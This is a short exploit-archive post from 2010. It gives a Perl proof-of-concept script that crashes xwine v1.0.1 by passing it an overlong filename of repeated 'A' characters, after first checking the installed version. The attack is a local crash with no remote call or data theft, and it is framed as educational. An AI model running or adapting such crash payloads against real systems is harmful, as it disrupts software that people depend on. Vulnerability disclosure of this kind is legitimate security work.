xwine v1.0.1 (.exe file) Local Crash PoC Exploit
Posted on 24 March 2010
================================================ xwine v1.0.1 (.exe file) Local Crash PoC Exploit ================================================ # xwine v1.0.1 (.exe file) Local Crash PoC Exploit # Install: sudo apt-get install xwine # # Author: JosS <Jose Luis Gongora Fernandez> # mail: sys-project[at]hotmail[dot]com # site: http://hack0wn.com/ # team: Spanish Hackers Team - [SHT] # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. <<crash.pl>> #!/usr/local/bin/perl chomp(my $version = `xwine --version`); if ($version =~ m/v1.0.1/) { print "Starting PoC... "; # payload = "xwine" . "A" x 4096 . ".exe"; chomp(my $buffer = `xwine AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.exe`); # print "$buffer "; } else { print " [-] Xwine is not installed on the system "; exit(1); } # Inj3ct0r.com [2010-03-24]
